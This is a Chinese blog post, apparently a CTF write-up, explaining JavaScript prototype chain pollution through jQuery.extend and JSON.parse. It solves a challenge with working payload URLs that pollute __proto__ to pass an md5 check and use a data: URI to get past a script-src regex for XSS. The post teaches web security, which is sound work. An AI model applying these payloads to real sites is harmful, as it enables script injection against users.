
<!DOCTYPE html>
<html lang="zh" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>js原型链污染 - oxcccccc</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="ccreater,"> 
    <meta name="description" content="js原型链污染 https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html 
什么是原型链 每,"> 
    <meta name="author" content="ccreater"> 
    <link rel="alternative" href="atom.xml" title="oxcccccc" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    <link href="https://fonts.loli.net/css?family=Roboto+Mono|Rubik&display=swap" rel="stylesheet">
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1429596_nzgqgvnmkjb.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.7.2/animate.min.css">

    
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/codemirror.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/theme/dracula.css">

    
<link rel="stylesheet" href="/css/obsidian.css">

    
<link rel="stylesheet" href="/css/ball-atom.min.css">

<meta name="generator" content="Hexo 4.1.1"></head>


<body class="loading">
    <div class="loader">
        <div class="la-ball-atom la-2x">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
    <span id="config-title" style="display:none">oxcccccc</span>
    <div id="loader"></div>
    
<div id="single">
    <div class="scrollbar gradient-bg-rev"></div>
<div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <div class="navigation animated fadeIn fast delay-1s">
        <img id="home-icon" class="icon-home" src="/img/favicon.png" alt="" data-url="https://explorersss.github.io">
        <div id="play-icon" title="Play/Pause" class="iconfont icon-play"></div>
        <h3 class="subtitle">js原型链污染</h3>
        <div class="social">
            <!--        <div class="like-icon">-->
            <!--            <a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
            <!--        </div>-->
            <div>
                <div class="share">
                    
                        <a href="javascript:;" class="iconfont icon-share1"></a>
                        <div class="share-component-cc" data-disabled="facebook,douban,linkedin,diandian,tencent,google"></div>
                    
                </div>
            </div>
        </div>
    </div>
</div>

    <div class="section">
        <div class=article-header-wrapper>
    <div class="article-header">
        <div class="article-cover animated fadeIn" style="
            animation-delay: 600ms;
            animation-duration: 1.2s;
            background-image: 
                radial-gradient(ellipse closest-side, rgba(0, 0, 0, 0.65), #100e17),
                url(/img/cover.jpg);">
        </div>
        <div class="else">
            <p class="animated fadeInDown">
                
                <a href="/categories/web"><b>「
                    </b>WEB<b> 」</b></a>
                
                February 18, 2020
            </p>
            <h3 class="post-title animated fadeInDown"><a href="/2020/02/18/js%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" title="js原型链污染" class="">js原型链污染</a>
            </h3>
            
            <p class="post-count animated fadeInDown">
                
                <span>
                    <b class="iconfont icon-text2"></b> <i>Words count</i>
                    9.1k
                </span>
                
                
                <span>
                    <b class="iconfont icon-timer__s"></b> <i>Reading time</i>
                    8 mins.
                </span>
                
                
                
                <span id="busuanzi_container_page_pv">
                    <b class="iconfont icon-read"></b> <i>Read count</i>
                    <span id="busuanzi_value_page_pv">0</span>
                </span>
                
            </p>
            
            
            <ul class="animated fadeInDown post-tags-list" itemprop="keywords"><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/ctf/" rel="tag">ctf</a></li></ul>
            
        </div>
    </div>
</div>

<div class="screen-gradient-after">
    <div class="screen-gradient-content">
        <div class="screen-gradient-content-inside">
            <div class="bold-underline-links screen-gradient-sponsor">
                <p>
                    <span class="animated fadeIn delay-1s"></span>
                </p>
            </div>
        </div>
    </div>
</div>

<div class="article">
    <div class='main'>
        <div class="content markdown animated fadeIn">
            <h1 id="js原型链污染"><a href="#js原型链污染" class="headerlink" title="js原型链污染"></a>js原型链污染</h1><p> <a href="https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html</a> </p>
<h2 id="什么是原型链"><a href="#什么是原型链" class="headerlink" title="什么是原型链"></a>什么是原型链</h2><p> 每个实例对象（ object ）都有一个私有属性（称之为 <strong>proto</strong> ）指向它的构造函数的原型对象（<strong>prototype</strong> ）。该原型对象也有一个自己的原型对象( <strong>proto</strong> ) ，层层向上直到一个对象的原型对象为 <code>null</code>。根据定义，<code>null</code> 没有原型，并作为这个<strong>原型链</strong>中的最后一个环节。 </p>
<pre><code class="javascript">function Foo
{

    this.a=&quot;456&quot;;
    this.c=&quot;777&quot;
}
Foo.prototype.b=&quot;123&quot;;
Foo.prototype.c=&quot;789&quot;;
var foo=new Foo();
console.log(foo.a);//456    
console.log(foo.b);//123
console.log(foo.c);//777</code></pre>
<p>当在当前对象找不到属性或方法时便会向上(<code>__proto__</code>中)寻找</p>
<ol>
<li>在对象foo中寻找b</li>
<li>如果找不到，则在<code>foo.__proto__</code>中寻找b</li>
<li>如果仍然找不到，则继续在<code>foo.__proto__.__proto__</code>中寻找b</li>
<li>依次寻找，直到找到<code>null</code>结束。比如，<code>Object.prototype</code>的<code>__proto__</code>就是<code>null</code></li>
</ol>
<p>JavaScript的这个查找的机制，被运用在面向对象的继承中，被称作prototype继承链。</p>
<p>以上就是最基础的JavaScript面向对象编程，我们并不深入研究更细节的内容，只要牢记以下几点即可：</p>
<ol>
<li>每个构造函数(constructor)都有一个原型对象(prototype)</li>
<li>对象的<code>__proto__</code>属性，指向类的原型对象<code>prototype</code></li>
<li>JavaScript使用prototype链实现继承机制</li>
</ol>
<h2 id="什么时原型链污染"><a href="#什么时原型链污染" class="headerlink" title="什么时原型链污染"></a>什么时原型链污染</h2><p>当我们修改对象的<code>__proto__</code>属性时,就相当于修改对象的父类</p>
<p>当调用不存在的方法或属性时便会在父类中寻找,就变相的控制了这个类</p>
<pre><code class="javascript">let foo = {bar: 1}

// foo.bar 此时为1
console.log(foo.bar)

// 修改foo的原型（即Object）
foo.__proto__.bar = 2

// 由于查找顺序的原因，foo.bar仍然是1
console.log(foo.bar)

// 此时再用Object创建一个空的zoo对象
let zoo = {}

// 查看zoo.bar
console.log(zoo.bar)</code></pre>
<h2 id="哪些情况原型链会被污染"><a href="#哪些情况原型链会被污染" class="headerlink" title="哪些情况原型链会被污染"></a>哪些情况原型链会被污染</h2><h3 id="merge"><a href="#merge" class="headerlink" title="merge"></a>merge</h3><h3 id="clone"><a href="#clone" class="headerlink" title="clone"></a>clone</h3><h3 id="JSON-parse"><a href="#JSON-parse" class="headerlink" title="JSON.parse"></a>JSON.parse</h3><h3 id="jQuery-extend"><a href="#jQuery-extend" class="headerlink" title="jQuery.extend"></a>jQuery.extend</h3><p><em>$</em>.extend( target [, object1 ] [, objectN ] )</p>
<p>指示是否深度合并</p>
<p><em>$</em>.extend( [deep ], target, object1 [, objectN ] )</p>
<p><strong>警告:</strong> 不支持第一个参数传递 false 。</p>
<table>
<thead>
<tr>
<th align="left">参数</th>
<th align="left">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><em>deep</em></td>
<td align="left">可选。 Boolean类型 指示是否深度合并对象，默认为false。如果该值为true，且多个对象的某个同名属性也都是对象，则该”属性对象”的属性也将进行合并。</td>
</tr>
<tr>
<td align="left"><em>target</em></td>
<td align="left">Object类型 目标对象，其他对象的成员属性将被附加到该对象上。</td>
</tr>
<tr>
<td align="left"><em>object1</em></td>
<td align="left">可选。 Object类型 第一个被合并的对象。</td>
</tr>
<tr>
<td align="left"><em>objectN</em></td>
<td align="left">可选。 Object类型 第N个被合并的对象。</td>
</tr>
</tbody></table>
<h2 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h2><p>题目代码</p>
<p>car.class.js</p>
<pre><code class="javascript">class Car {
    constructor(type, model, color, pic, key=&quot;&quot;) {
        this.type = type
        this.model = model
        this.color = color
        this.key = key
        this.pic = pic

        let started = false
        this.start = () =&gt; {
            started = true
        }
        this.isStarted = () =&gt; {
            return started
        }
    }
    powerOn() {
        if (this.isStarted()) {
            infobox(`Well Done!`)
            nextCar()

        } else {
            $(&#39;.chargeup&#39;)[0].play()
        }
    }
    info() {
        infobox(`This car is a ${this.type} ${this.model} in ${this.color}. It looks very nice! But it seems to be broken ...`)
    }
    repair() {
        if(urlParams.has(&#39;repair&#39;)) {
            $.extend(true, this, JSON.parse(urlParams.get(&#39;repair&#39;)))
        }
    }
    light() {
        infobox(`You turn on the lights ... Nothing happens.`)
    }
    battery() {
        infobox(`Hmmm, the battery is almost empty ... Maybe i can repair this somehow.`)
    }
    ignition() {
        if (this.key == &quot;&quot;) {
            infobox(`Looks like the key got lost. No wonder the car is not starting ...`)
        }
        if (this.key == &quot;🔑&quot;) {
            infobox(`The car started!`)
            this.start()
        }
    }
}</code></pre>
<p>util.js</p>
<pre><code class="javascript">const urlParams = new URLSearchParams(window.location.search)
const h = location.hash.slice(1)
const bugatti = new Car(&#39;Bugatti&#39;, &#39;T35&#39;, &#39;green&#39;, &#39;assets/images/bugatti.png&#39;)
const porsche = new Car(&#39;Porsche&#39;, &#39;911&#39;, &#39;yellow&#39;, &#39;assets/images/porsche.png&#39;)

const cars = [bugatti, porsche]

porsche.repair = () =&gt; {
    if(!bugatti.isStarted()){
        infobox(`Not so fast. Repair the other car first!`)
    }
    else if($.md5(porsche) == &#39;9cdfb439c7876e703e307864c9167a15&#39;){
        if(urlParams.has(&#39;help&#39;)) {
            repairWithHelper(urlParams.get(&#39;help&#39;))
        }
    }
    else{
        infobox(`Repairing this is not that easy.`)
    }
}
porsche.ignition = () =&gt; {
    infobox(`Hmm ... WTF!`)
}

$(document).ready(() =&gt; {
    const [car] = cars
    $(&#39;.fa-power-off&#39;).click(() =&gt; car.powerOn())
    $(&#39;.fa-car&#39;).click(() =&gt; car.info())
    $(&#39;.fa-lightbulb-o&#39;).click(() =&gt; car.light())
    $(&#39;.fa-battery-quarter&#39;).click(() =&gt; car.battery())
    $(&#39;.fa-key&#39;).click(() =&gt; car.ignition())
    $(&#39;.fa-wrench&#39;).click(() =&gt; car.repair())

    $(&#39;.fa-step-forward&#39;).click(() =&gt; nextCar())

    if(h.includes(&#39;Bugatti&#39;))
        autoStart(bugatti)
    if(h.includes(&#39;Porsche&#39;))
        autoStart(porsche)
})


const nextCar = () =&gt; {
    cars.push(cars.shift())
    $(&quot;.image&quot;).attr(&#39;src&#39;, cars[0].pic);
}


const autoStart = (car) =&gt; {
    car.repair()
    car.ignition()
    car.powerOn()
}


const repairWithHelper = (src) =&gt; {
    /* who needs csp anyways !? */
    urlRegx = /^\w{4,5}:\/\/car-repair-shop\.fluxfingersforfuture\.fluxfingers\.net\/[\w\d]+\/.+\.js$/;
    if (urlRegx.test(src)) {
        let s = document.createElement(&#39;script&#39;)
        s.src = src
        $(&#39;head&#39;).append(s)
    }
}


const infobox = (text) =&gt; {
    $(&#39;a&#39;).css({&#39;pointer-events&#39;: &#39;none&#39;, &#39;border&#39;: &#39;none&#39;})
    $(&#39;.infobox&#39;).addClass(&#39;infoAnimate&#39;)
        .text(text)
        .on(&#39;animationend&#39;, function() {
            $(this).removeClass(&#39;infoAnimate&#39;)
            $(&#39;a&#39;).css({&#39;pointer-events&#39;: &#39;all&#39;, &#39;border&#39;: &#39;solid 1px rgba(255, 255, 255, .25)&#39;})
    })

}</code></pre>
<p>阅读代码发现car类的repair方法会调用</p>
<p><code>$.extend(true, this, JSON.parse(urlParams.get(&#39;repair&#39;)))</code></p>
<p>可以进行原型链污染</p>
<p>而这一题我们的目标时进行xss</p>
<p>阅读代码发现对象<code>porsche</code>的repairWithHelper中可以进行xss</p>
<p>而调用repairWithHelper方法就需要调用porsche的repair方法</p>
<pre><code>if($.md5(porsche) == &#39;9cdfb439c7876e703e307864c9167a15&#39;){
        if(urlParams.has(&#39;help&#39;)) {
            repairWithHelper(urlParams.get(&#39;help&#39;))
        }
}</code></pre><p>我们用控制porsche.toString()==’lol’(lol的md5是9cdfb439c7876e703e307864c9167a15)，我们可以通过原型链污染来让上层为<code>[&#39;lol&#39;]</code>([‘lol’].toString()==’lol’)</p>
<p>通过autoStart来调用bugatti.repair(原型链污染)和porsche.repair(调用repairWithHelper方法)</p>
<p>所以构造payload:<code>http://127.0.0.1/?repair={&quot;started&quot;:true,&quot;__proto__&quot;:{&quot;__proto__&quot;:[&quot;lol&quot;]}}</code></p>
<p>接下来就是利用repairWithHelper来进行xss</p>
<pre><code class="javascript">const repairWithHelper = (src) =&gt; {
    /* who needs csp anyways !? */
    urlRegx = /^\w{4,5}:\/\/car-repair-shop\.fluxfingersforfuture\.fluxfingers\.net\/[\w\d]+\/.+\.js$/;
    if (urlRegx.test(src)) {
        let s = document.createElement(&#39;script&#39;)
        s.src = src
        $(&#39;head&#39;).append(s)
    }
}</code></pre>
<p>虽然这里对url的域名进行了限制不能远程文件包含</p>
<p>但是我们可以利用data协议来绕过正则从而直接执行命令</p>
<p>data协议格式</p>
<pre><code>data:[&lt;mime type&gt;][;charset=&lt;charset&gt;][;base64],&lt;encoded data&gt;</code></pre><p>最后的payload:<code>http://127.0.0.1/?repair={&quot;key&quot;:&quot;🔑&quot;,&quot;__proto__&quot;:{&quot;__proto__&quot;:[&quot;lol&quot;]}}&amp;help=data://car-repair-shop.fluxfingersforfuture.fluxfingers.net/asdfsdf/asdf,alert(&quot;123&quot;)%23.js#BugattiPorsche</code></p>
<p><strong>本文作者</strong>：ccreater<br/><strong>本文地址</strong>： <a href="https://explorersss.github.io/2020/02/18/js原型链污染/">https://explorersss.github.io/2020/02/18/js原型链污染/</a> <br/><strong>版权声明</strong>：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处</p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls"
                data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
            <ul id="audio-list" style="display:none">
                
                
                <li title='0' data-url='/statics/chengdu.mp3'></li>
                
                    
            </ul>
            
            
            
    <div id='gitalk-container' class="comment link"
        data-ae='true'
        data-ci='3fd4b7c51e3cfe6d1f43'
        data-cs='e3b1162bfd0bc86431672a764a8c801b4dc97929'
        data-r='Explorersss.github.io'
        data-o='Explorersss'
        data-a='Explorersss'
        data-d=''
    >Comments</div>


            
            
        </div>
        <div class="sidebar">
            <div class="box animated fadeInRight">
                <div class="subbox">
                    <img src="https://res.cloudinary.com/tridiamond/image/upload/v1573019751/TriDiamond_logo_ui_xeublz.jpg" height=300 width=300></img>
                    <p>ccreater</p>
                    <span>不忘初心,方得始终</span>
                    <dl>
                        <dd><a href="https://github.com/Explorersss" target="_blank"><span
                                    class=" iconfont icon-github"></span></a></dd>
                        <dd><a href="https://twitter.com/explore" target="_blank"><span
                                    class=" iconfont icon-twitter"></span></a></dd>
                        <dd><a href="https://stackoverflow.com/users/11778815/ccreater" target="_blank"><span
                                    class=" iconfont icon-stack-overflow"></span></a></dd>
                    </dl>
                </div>
                <ul>
                    <li><a href="/">34 <p>Articles</p></a></li>
                    <li><a href="/categories">9 <p>Categories</p></a></li>
                    <li><a href="/tags">19 <p>Tags</p></a></li>
                </ul>
            </div>
            
            
            
            <div class="box sticky animated fadeInRight faster">
                <div id="toc" class="subbox">
                    <h4>Contents</h4>
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#js原型链污染"><span class="toc-number">1.</span> <span class="toc-text">js原型链污染</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#什么是原型链"><span class="toc-number">1.1.</span> <span class="toc-text">什么是原型链</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#什么时原型链污染"><span class="toc-number">1.2.</span> <span class="toc-text">什么时原型链污染</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#哪些情况原型链会被污染"><span class="toc-number">1.3.</span> <span class="toc-text">哪些情况原型链会被污染</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#merge"><span class="toc-number">1.3.1.</span> <span class="toc-text">merge</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#clone"><span class="toc-number">1.3.2.</span> <span class="toc-text">clone</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#JSON-parse"><span class="toc-number">1.3.3.</span> <span class="toc-text">JSON.parse</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#jQuery-extend"><span class="toc-number">1.3.4.</span> <span class="toc-text">jQuery.extend</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#例题"><span class="toc-number">1.4.</span> <span class="toc-text">例题</span></a></li></ol></li></ol>
                </div>
            </div>
            
            
        </div>
    </div>
</div>

    </div>
</div>
    <div id="back-to-top" class="animated fadeIn faster">
        <div class="flow"></div>
        <span class="percentage animated fadeIn faster">0%</span>
        <span class="iconfont icon-top02 animated fadeIn faster"></span>
    </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"right","width":150,"height":300,"hOffset":100},"mobile":{"show":true},"react":{"opacity":0.7},"dialog":{"enable":true,"hitokoto":true},"log":false});</script></body>
<footer>
    <p class="copyright" id="copyright">
        &copy; 2020
        <span class="gradient-text">
            ccreater
        </span>.
        Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a>
        Theme
        <span class="gradient-text">
            <a href="https://github.com/TriDiamond/hexo-theme-obsidian" title="Obsidian" target="_blank" rel="noopener">Obsidian</a>
        </span>
        <small><a href="https://github.com/TriDiamond/hexo-theme-obsidian/blob/master/CHANGELOG.md" title="v1.4.3" target="_blank" rel="noopener">v1.4.3</a></small>
    </p>
</footer>

<script type="text/javascript" src="https://cdn.bootcss.com/mathjax/2.7.6/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<script>
  MathJax.Hub.Config({
    "HTML-CSS": {
      preferredFont: "TeX",
      availableFonts: ["STIX", "TeX"],
      linebreaks: {
        automatic: true
      },
      EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
      inlineMath: [
        ["$", "$"],
        ["\\(", "\\)"]
      ],
      processEscapes: true,
      ignoreClass: "tex2jax_ignore|dno",
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      noUndefined: {
        attributes: {
          mathcolor: "red",
          mathbackground: "#FFEEEE",
          mathsize: "90%"
        }
      },
      Macros: {
        href: "{}"
      }
    },
    messageStyle: "none"
  });
</script>
<script>
  function initialMathJax() {
    MathJax.Hub.Queue(function () {
      var all = MathJax.Hub.getAllJax(),
        i;
      // console.log(all);
      for (i = 0; i < all.length; i += 1) {
        console.log(all[i].SourceElement().parentNode)
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  }

  function reprocessMathJax() {
    if (typeof MathJax !== 'undefined') {
      MathJax.Hub.Queue(["Typeset", MathJax.Hub]);
    }
  }
</script>



    
<link rel="stylesheet" href="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.css">

    
<script src="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.js"></script>



<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/obsidian.js"></script>
<script src="/js/jquery.truncate.js"></script>
<script src="/js/search.js"></script>


<script src="//cdn.bootcss.com/typed.js/2.0.10/typed.min.js"></script>


<script src="//cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script>


<script src="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>


<script src="https://cdn.bootcss.com/codemirror/5.48.4/codemirror.min.js"></script>

    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/javascript/javascript.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/css/css.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/xml/xml.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/htmlmixed/htmlmixed.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/php/php.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/python/python.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>




    
<script src="/js/busuanzi.min.js"></script>

    <script>
        $(document).ready(function () {
            if ($('span[id^="busuanzi_"]').length) {
                initialBusuanzi();
            }
        });
    </script>



<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/default-skin/default-skin.min.css">


<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>



    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="//www.googletagmanager.com/gtag/js?id=UA-149874671-1"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'UA-149874671-1');
    </script>





<script>
    function initialTyped () {
        var typedTextEl = $('.typed-text');
        if (typedTextEl && typedTextEl.length > 0) {
            var typed = new Typed('.typed-text', {
                strings: ["不忘初心,方得始终", "Think like an artist, develop like an artisan"],
                typeSpeed: 90,
                loop: true,
                loopCount: Infinity,
                backSpeed: 20,
            });
        }
    }

    if ($('.article-header') && $('.article-header').length) {
        $(document).ready(function () {
            initialTyped();
        });
    }
</script>



<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/click.js"></script>
<script type="text/javascript" src="/js/click-word.js"></script>
<canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
<script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
<script type="text/javascript" src="/js/fireworks.js"></script>
</html>
